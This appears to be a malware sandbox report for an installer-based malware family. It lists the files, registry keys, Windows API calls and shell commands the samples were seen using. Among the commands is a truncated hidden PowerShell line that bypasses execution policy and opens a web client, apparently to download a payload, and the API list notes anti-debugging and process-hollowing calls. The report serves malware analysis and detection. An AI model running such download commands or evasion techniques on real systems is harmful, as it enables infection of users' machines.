• WRARSFX
• x64
• x86

Files Modified

i

Files Modified

This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.

File	Attributes
\device\namedpipe	Generic Read,Write Attributes
\device\namedpipe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data

Show More

c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll	Generic Write,Read Attributes

Registry Modifications

i

Registry Modifications

This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.

Key::Value	Daten	API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	졷鑂셱ǜ	RegNtPreCreateKey

Windows API Usage

i

Windows API Usage

This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.

Category	API
Other Suspicious	SetWindowsHookEx
Anti Debug	IsDebuggerPresent OutputDebugString
User Data Access	GetUserDefaultLocaleName GetUserObjectInformation
Process Manipulation Evasion	NtUnmapViewOfSection ZwMapViewOfSection
Process Shell Execute	CreateProcess
Keyboard Access	GetKeyState
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtApphelpCacheControl ntdll.dll!NtClearEvent ntdll.dll!NtClose Show More ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateMutant ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtReleaseMutant ntdll.dll!NtReleaseSemaphore ntdll.dll!NtReleaseWorkerFactoryWorker ntdll.dll!NtRequestWaitReplyPort ntdll.dll!NtResumeThread ntdll.dll!NtSetEvent ntdll.dll!NtSetInformationKey ntdll.dll!NtSetInformationProcess ntdll.dll!NtSetInformationThread ntdll.dll!NtSetInformationVirtualMemory ntdll.dll!NtSetInformationWorkerFactory ntdll.dll!NtSetTimer2 ntdll.dll!NtSubscribeWnfStateChange ntdll.dll!NtTestAlert ntdll.dll!NtTraceControl ntdll.dll!NtUnmapViewOfSection ntdll.dll!NtUnmapViewOfSectionEx ntdll.dll!NtWaitForAlertByThreadId ntdll.dll!NtWaitForMultipleObjects ntdll.dll!NtWaitForSingleObject ntdll.dll!NtWaitForWorkViaWorkerFactory ntdll.dll!NtWaitLowEventPair ntdll.dll!NtWorkerFactoryWorkerReady ntdll.dll!NtWriteFile UNKNOWN
Encryption Used	BCryptOpenAlgorithmProvider

Shell Command Execution

i

Shell Command Execution

This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"

"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"

"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"

"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"

"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"

Show More

powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient

"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"